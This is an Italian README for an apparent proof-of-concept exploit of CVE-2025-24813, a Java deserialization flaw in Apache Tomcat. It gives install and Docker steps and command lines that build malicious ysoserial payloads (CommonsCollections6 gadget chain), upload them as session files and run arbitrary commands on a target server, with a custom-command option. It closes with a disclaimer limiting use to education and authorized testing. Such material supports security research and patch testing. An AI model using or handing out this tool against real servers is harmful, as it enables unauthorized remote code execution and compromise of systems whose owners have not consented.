
Exploit proof-of-concept per CVE-2025-24813, una vulnerabilità di deserializzazione Java in Apache Tomcat. Genera payload serializzati malevoli e li carica come file di sessione per attivare l'esecuzione di codice remota.
Questo repository contiene un exploit proof-of-concept per CVE-2025-24813, una vulnerabilità di deserializzazione Java in Apache Tomcat.
Basato su absholi7ly/POC-CVE-2025-24813/.
Installa le dipendenze:
uv venv
source .venv/bin/activate
uv sync
Scarica ysoserial:
./download.sh
Costruisci ed esegui l'exploit in un container:
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
Esegui l'exploit direttamente:
python main.py <target_url> [options]
--command: Comando da eseguire (predefinito: calc.exe)--ysoserial: Percorso di ysoserial.jar (predefinito: ./ysoserial-all.jar)--gadget: Catena gadget ysoserial (predefinita: CommonsCollections6)--payload_type: Tipo di payload - ysoserial o java (predefinito: ysoserial)--no-ssl-verify: Disabilita la verifica SSL# Basic usage
python main.py http://target:8080
# Custom command
python main.py http://target:8080 --command "whoami"
# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java
Questo strumento è destinato esclusivamente a scopi educativi e di test autorizzati. Non utilizzarlo contro sistemi di cui non possiedi o non hai esplicita autorizzazione per testare.